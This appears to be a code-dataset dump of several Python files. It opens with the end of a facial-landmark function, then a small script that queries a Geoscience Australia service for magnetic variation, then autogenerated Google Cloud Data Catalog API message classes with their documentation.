res['right_eyebrow_left_corner']['y']], [res['right_eyebrow_upper_left_quarter']['x'], res['right_eyebrow_upper_left_quarter']['y']], [res['right_eyebrow_upper_middle']['x'], res['right_eyebrow_upper_middle']['y']], [res['right_eyebrow_upper_right_quarter']['x'], res['right_eyebrow_upper_right_quarter']['y']], [res['right_eyebrow_right_corner']['x'], res['right_eyebrow_right_corner']['y']], [res['right_eyebrow_lower_left_quarter']['x'], res['right_eyebrow_lower_left_quarter']['y']], [res['right_eyebrow_lower_middle']['x'], res['right_eyebrow_lower_middle']['y']], [res['right_eyebrow_lower_right_quarter']['x'], res['right_eyebrow_lower_right_quarter']['y']], ] return pointer
[((37, 7, 37, 26), 'os.path.isfile', 'os.path.isfile', ({(37, 22, 37, 25): 'txt'}, {}), '(txt)', False, 'import os\n'), ((71, 8, 71, 55), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((41, 9, 41, 30), 'os.path.isfile', 'os.path.isfile', ({(41, 24, 41, 29): 'image'}, {}), '(image)', False, 'import os\n'), ((46, 12, 46, 30), 'json.loads', 'json.loads', ({(46, 23, 46, 29): 'points'}, {}), '(points)', False, 'import json\n')]
rafidmorshedi/mag-dec-api
magvar.py
5daff929be8cad902f8db331090c0ed77f7bdef9
import requests import time from bs4 import BeautifulSoup import re def decdeg2dms(dd): negative = dd < 0 dd = abs(dd) minutes,seconds = divmod(dd*3600,60) degrees,minutes = divmod(minutes,60) if negative: if degrees > 0: degrees = -degrees elif minutes > 0: minutes = -minutes else: seconds = -seconds return (degrees,minutes,seconds) def get_mag_var(lat, lon, year, month, day, elev=0): """Returns the magnetic variation at a particulat point on earth. Keyword Arguments lat -- latitude (e.g. -180.6 deg) lon -- longitude (e.g. -34.6 deg) elev -- elevation in km (default 0.0) year -- year (e.g. 2015) month -- month (e.g. 11) day -- day (e.g. 30) Returns float -- magnetic variation """ (latd, latm, lats) = decdeg2dms(lat) (lond, lonm, lons) = decdeg2dms(lon) payload = {'latd': latd,'latm':latm,'lats':lats,'lond':lond,'lonm':lonm, 'lons':lons,'elev':elev,'year':year,'month':month,'day':day,'Ein':'D'} url = 'http://www.ga.gov.au/oracle/cgi/geoAGRF.sh' # Sleep to avoid spamming server time.sleep(1) r = requests.get(url, params=payload) if r.status_code == 200: c = r.content soup = BeautifulSoup(c,'html.parser') deg_text = soup.find_all('b')[-1].text.strip() # strip out the junk so we have a number # Strip spaces before the search deg_text = deg_text.replace(" ","") deg = re.search(r'D=(.*?)deg', deg_text).group(1) deg = float(deg) return deg else: return 'something went wrong'
[((42, 4, 42, 17), 'time.sleep', 'time.sleep', ({(42, 15, 42, 16): '(1)'}, {}), '(1)', False, 'import time\n'), ((44, 8, 44, 41), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((47, 15, 47, 45), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(47, 29, 47, 30): 'c', (47, 31, 47, 44): '"""html.parser"""'}, {}), "(c, 'html.parser')", False, 'from bs4 import BeautifulSoup\n'), ((52, 14, 52, 48), 're.search', 're.search', ({(52, 24, 52, 37): '"""D=(.*?)deg"""', (52, 39, 52, 47): 'deg_text'}, {}), "('D=(.*?)deg', deg_text)", False, 'import re\n')]
bopopescu/Social-Lite
google-cloud-sdk/lib/googlecloudsdk/third_party/apis/datacatalog/v1beta1/datacatalog_v1beta1_messages.py
ee05d6a7431c36ff582c8d6b58bb20a8c5f550bf
"""Generated message classes for datacatalog version v1beta1. A fully managed and highly scalable data discovery and metadata management service. """ # NOTE: This file is autogenerated and should not be edited by hand. from apitools.base.protorpclite import messages as _messages from apitools.base.py import encoding package = 'datacatalog' class Binding(_messages.Message): r"""Associates `members` with a `role`. Fields: condition: The condition that is associated with this binding. NOTE: An unsatisfied condition will not allow user access via current binding. Different bindings, including their conditions, are examined independently. members: Specifies the identities requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `[email protected]` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other- [email protected]`. * `group:{emailid}`: An email address that represents a Google group. For example, `[email protected]`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `[email protected]?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other- [email protected]?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `[email protected]?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`. role: Role that is assigned to `members`. For example, `roles/viewer`, `roles/editor`, or `roles/owner`. """ condition = _messages.MessageField('Expr', 1) members = _messages.StringField(2, repeated=True) role = _messages.StringField(3) class DatacatalogEntriesLookupRequest(_messages.Message): r"""A DatacatalogEntriesLookupRequest object. Fields: linkedResource: The full name of the Google Cloud Platform resource the Data Catalog entry represents. See: https://cloud.google.com/apis/design/resource_names#full_resource_name. Full names are case-sensitive. Examples: * //bigquery.googleapis.com/ projects/projectId/datasets/datasetId/tables/tableId * //pubsub.googleapis.com/projects/projectId/topics/topicId sqlResource: The SQL name of the entry. SQL names are case-sensitive. Examples: * `cloud_pubsub.project_id.topic_id` * ``pubsub.project_id.`topic.id.with.dots` `` * `bigquery.table.project_id.dataset_id.table_id` * `bigquery.dataset.project_id.dataset_id` * `datacatalog.entry.project_id.location_id.entry_group_id.entry_id` `*_id`s shoud satisfy the standard SQL rules for identifiers. https://cloud.google.com/bigquery/docs/reference/standard-sql/lexical. """ linkedResource = _messages.StringField(1) sqlResource = _messages.StringField(2) class DatacatalogProjectsLocationsEntryGroupsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsCreateRequest object. Fields: entryGroupId: Required. The id of the entry group to create. The id must begin with a letter or underscore, contain only English letters, numbers and underscores, and be at most 64 characters. googleCloudDatacatalogV1beta1EntryGroup: A GoogleCloudDatacatalogV1beta1EntryGroup resource to be passed as the request body. parent: Required. The name of the project this entry group is in. Example: * projects/{project_id}/locations/{location} Note that this EntryGroup and its child resources may not actually be stored in the location in this name. """ entryGroupId = _messages.StringField(1) googleCloudDatacatalogV1beta1EntryGroup = _messages.MessageField('GoogleCloudDatacatalogV1beta1EntryGroup', 2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsEntryGroupsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsDeleteRequest object. Fields: force: Optional. If true, deletes all entries in the entry group. name: Required. The name of the entry group. For example, `projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} `. """ force = _messages.BooleanField(1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest object. Fields: entryId: Required. The id of the entry to create. googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry resource to be passed as the request body. parent: Required. The name of the entry group this entry is in. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} Note that this Entry and its child resources may not actually be stored in the location in this name. """ entryId = _messages.StringField(1) googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest object. Fields: name: Required. The name of the entry. Example: * projects/{project_id}/l ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id} """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest object. Fields: name: Required. The name of the entry. Example: * projects/{project_id}/l ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id} Entry groups are logical groupings of entries. Currently, users cannot create/modify entry groups. They are created by Data Catalog; they include `@bigquery` for all BigQuery entries, and `@pubsub` for all Cloud Pub/Sub entries. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest object. Fields: googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry resource to be passed as the request body. name: The Data Catalog resource name of the entry in URL format. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id }/entries/{entry_id} Note that this Entry and its child resources may not actually be stored in the location in this name. updateMask: The fields to update on the entry. If absent or empty, all modifiable fields are updated. The following fields are modifiable: * For entries with type `DATA_STREAM`: * `schema` * For entries with type `FILESET` * `schema` * `display_name` * `description` * `gcs_fileset_spec` * `gcs_fileset_spec.file_patterns` """ googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest object. Fields: googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag resource to be passed as the request body. parent: Required. The name of the resource to attach this tag to. Tags can be attached to Entries. Example: * projects/{project_id}/locations/{loc ation}/entryGroups/{entry_group_id}/entries/{entry_id} Note that this Tag and its child resources may not actually be stored in the location in this name. """ googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest object. Fields: name: Required. The name of the tag to delete. Example: * projects/{proje ct_id}/locations/{location}/entryGroups/{entry_group_id}/entries/{entry_ id}/tags/{tag_id} """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest object. Fields: pageSize: The maximum number of tags to return. Default is 10. Max limit is 1000. pageToken: Token that specifies which page is requested. If empty, the first page is returned. parent: Required. The name of the Data Catalog resource to list the tags of. The resource could be an Entry. """ pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32) pageToken = _messages.StringField(2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest object. Fields: googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag resource to be passed as the request body. name: The resource name of the tag in URL format. Example: * projects/{pr oject_id}/locations/{location}/entrygroups/{entry_group_id}/entries/{ent ry_id}/tags/{tag_id} where `tag_id` is a system-generated identifier. Note that this Tag may not actually be stored in the location in this name. updateMask: The fields to update on the Tag. If absent or empty, all modifiable fields are updated. Currently the only modifiable field is the field `fields`. """ googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsEntryGroupsGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsGetRequest object. Fields: name: Required. The name of the entry group. For example, `projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} `. readMask: The fields to return. If not set or empty, all fields are returned. """ name = _messages.StringField(1, required=True) readMask = _messages.StringField(2) class DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsTagTemplatesCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesCreateRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplate: A GoogleCloudDatacatalogV1beta1TagTemplate resource to be passed as the request body. parent: Required. The name of the project and the location this template is in. Example: * projects/{project_id}/locations/{location} TagTemplate and its child resources may not actually be stored in the location in this name. tagTemplateId: Required. The id of the tag template to create. """ googleCloudDatacatalogV1beta1TagTemplate = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplate', 1) parent = _messages.StringField(2, required=True) tagTemplateId = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesDeleteRequest object. Fields: force: Required. Currently, this field must always be set to `true`. This confirms the deletion of any possible tags using this template. `force = false` will be supported in the future. name: Required. The name of the tag template to delete. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } """ force = _messages.BooleanField(1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesFieldsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsCreateRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplateField: A GoogleCloudDatacatalogV1beta1TagTemplateField resource to be passed as the request body. parent: Required. The name of the project this template is in. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } Note that this TagTemplateField may not actually be stored in the location in this name. tagTemplateFieldId: Required. The ID of the tag template field to create. Field ids can contain letters (both uppercase and lowercase), numbers (0-9), underscores (_) and dashes (-). Field IDs must be at least 1 character long and at most 128 characters long. Field IDs must also be unique within their template. """ googleCloudDatacatalogV1beta1TagTemplateField = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplateField', 1) parent = _messages.StringField(2, required=True) tagTemplateFieldId = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesFieldsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsDeleteRequest object. Fields: force: Required. Currently, this field must always be set to `true`. This confirms the deletion of this field from any tags using this field. `force = false` will be supported in the future. name: Required. The name of the tag template field to delete. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id }/fields/{tag_template_field_id} """ force = _messages.BooleanField(1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesFieldsPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsPatchRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplateField: A GoogleCloudDatacatalogV1beta1TagTemplateField resource to be passed as the request body. name: Required. The name of the tag template field. Example: * projects/{ project_id}/locations/{location}/tagTemplates/{tag_template_id}/fields/{ tag_template_field_id} updateMask: Optional. The field mask specifies the parts of the template to be updated. Allowed fields: * `display_name` * `type.enum_type` * `is_required` If `update_mask` is not set or empty, all of the allowed fields above will be updated. When updating an enum type, the provided values will be merged with the existing values. Therefore, enum values can only be added, existing enum values cannot be deleted nor renamed. Updating a template field from optional to required is NOT allowed. """ googleCloudDatacatalogV1beta1TagTemplateField = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplateField', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesFieldsRenameRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesFieldsRenameRequest object. Fields: googleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest: A GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest resource to be passed as the request body. name: Required. The name of the tag template. Example: * projects/{projec t_id}/locations/{location}/tagTemplates/{tag_template_id}/fields/{tag_te mplate_field_id} """ googleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest = _messages.MessageField('GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest', 1) name = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTagTemplatesGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesGetRequest object. Fields: name: Required. The name of the tag template. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTagTemplatesPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesPatchRequest object. Fields: googleCloudDatacatalogV1beta1TagTemplate: A GoogleCloudDatacatalogV1beta1TagTemplate resource to be passed as the request body. name: The resource name of the tag template in URL format. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } Note that this TagTemplate and its child resources may not actually be stored in the location in this name. updateMask: The field mask specifies the parts of the template to overwrite. Allowed fields: * `display_name` If absent or empty, all of the allowed fields above will be updated. """ googleCloudDatacatalogV1beta1TagTemplate = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplate', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTagTemplatesSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsTagTemplatesTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTagTemplatesTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsTaxonomiesCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesCreateRequest object. Fields: googleCloudDatacatalogV1beta1Taxonomy: A GoogleCloudDatacatalogV1beta1Taxonomy resource to be passed as the request body. parent: Required. Resource name of the project that the taxonomy will belong to. """ googleCloudDatacatalogV1beta1Taxonomy = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesDeleteRequest object. Fields: name: Required. Resource name of the taxonomy to be deleted. All policy tags in this taxonomy will also be deleted. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesExportRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesExportRequest object. Fields: parent: Required. Resource name of the project that taxonomies to be exported will share. serializedTaxonomies: Export taxonomies as serialized taxonomies. taxonomies: Required. Resource names of the taxonomies to be exported. """ parent = _messages.StringField(1, required=True) serializedTaxonomies = _messages.BooleanField(2) taxonomies = _messages.StringField(3, repeated=True) class DatacatalogProjectsLocationsTaxonomiesGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesGetRequest object. Fields: name: Required. Resource name of the requested taxonomy. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesImportRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesImportRequest object. Fields: googleCloudDatacatalogV1beta1ImportTaxonomiesRequest: A GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest resource to be passed as the request body. parent: Required. Resource name of project that the newly created taxonomies will belong to. """ googleCloudDatacatalogV1beta1ImportTaxonomiesRequest = _messages.MessageField('GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesListRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesListRequest object. Fields: pageSize: The maximum number of items to return. Must be a value between 1 and 1000. If not set, defaults to 50. pageToken: The next_page_token value returned from a previous list request, if any. If not set, defaults to an empty string. parent: Required. Resource name of the project to list the taxonomies of. """ pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32) pageToken = _messages.StringField(2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsTaxonomiesPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPatchRequest object. Fields: googleCloudDatacatalogV1beta1Taxonomy: A GoogleCloudDatacatalogV1beta1Taxonomy resource to be passed as the request body. name: Output only. Resource name of this taxonomy, whose format is: "projects/{project_number}/locations/{location_id}/taxonomies/{id}". updateMask: The update mask applies to the resource. For the `FieldMask` definition, see https://developers.google.com/protocol- buffers/docs/reference/google.protobuf#fieldmask If not set, defaults to all of the fields that are allowed to update. """ googleCloudDatacatalogV1beta1Taxonomy = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsCreateRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsCreateRequest object. Fields: googleCloudDatacatalogV1beta1PolicyTag: A GoogleCloudDatacatalogV1beta1PolicyTag resource to be passed as the request body. parent: Required. Resource name of the taxonomy that the policy tag will belong to. """ googleCloudDatacatalogV1beta1PolicyTag = _messages.MessageField('GoogleCloudDatacatalogV1beta1PolicyTag', 1) parent = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsDeleteRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsDeleteRequest object. Fields: name: Required. Resource name of the policy tag to be deleted. All of its descendant policy tags will also be deleted. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetIamPolicyRequest object. Fields: getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the request body. resource: REQUIRED: The resource for which the policy is being requested. See the operation documentation for the appropriate value for this field. """ getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1) resource = _messages.StringField(2, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsGetRequest object. Fields: name: Required. Resource name of the requested policy tag. """ name = _messages.StringField(1, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsListRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsListRequest object. Fields: pageSize: The maximum number of items to return. Must be a value between 1 and 1000. If not set, defaults to 50. pageToken: The next_page_token value returned from a previous List request, if any. If not set, defaults to an empty string. parent: Required. Resource name of the taxonomy to list the policy tags of. """ pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32) pageToken = _messages.StringField(2) parent = _messages.StringField(3, required=True) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsPatchRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsPatchRequest object. Fields: googleCloudDatacatalogV1beta1PolicyTag: A GoogleCloudDatacatalogV1beta1PolicyTag resource to be passed as the request body. name: Output only. Resource name of this policy tag, whose format is: "pro jects/{project_number}/locations/{location_id}/taxonomies/{taxonomy_id}/ policyTags/{id}". updateMask: The update mask applies to the resource. Only display_name, description and parent_policy_tag can be updated and thus can be listed in the mask. If update_mask is not provided, all allowed fields (i.e. display_name, description and parent) will be updated. For more information including the `FieldMask` definition, see https://developers.google.com/protocol- buffers/docs/reference/google.protobuf#fieldmask If not set, defaults to all of the fields that are allowed to update. """ googleCloudDatacatalogV1beta1PolicyTag = _messages.MessageField('GoogleCloudDatacatalogV1beta1PolicyTag', 1) name = _messages.StringField(2, required=True) updateMask = _messages.StringField(3) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsTaxonomiesPolicyTagsTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesPolicyTagsTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class DatacatalogProjectsLocationsTaxonomiesSetIamPolicyRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesSetIamPolicyRequest object. Fields: resource: REQUIRED: The resource for which the policy is being specified. See the operation documentation for the appropriate value for this field. setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2) class DatacatalogProjectsLocationsTaxonomiesTestIamPermissionsRequest(_messages.Message): r"""A DatacatalogProjectsLocationsTaxonomiesTestIamPermissionsRequest object. Fields: resource: REQUIRED: The resource for which the policy detail is being requested. See the operation documentation for the appropriate value for this field. testIamPermissionsRequest: A TestIamPermissionsRequest resource to be passed as the request body. """ resource = _messages.StringField(1, required=True) testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2) class Empty(_messages.Message): r"""A generic empty message that you can re-use to avoid defining duplicated empty messages in your APIs. A typical example is to use it as the request or the response type of an API method. For instance: service Foo { rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON representation for `Empty` is empty JSON object `{}`. """ class Expr(_messages.Message): r"""Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information. Fields: description: Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI. expression: Textual representation of an expression in Common Expression Language syntax. location: Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file. title: Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs which allow to enter 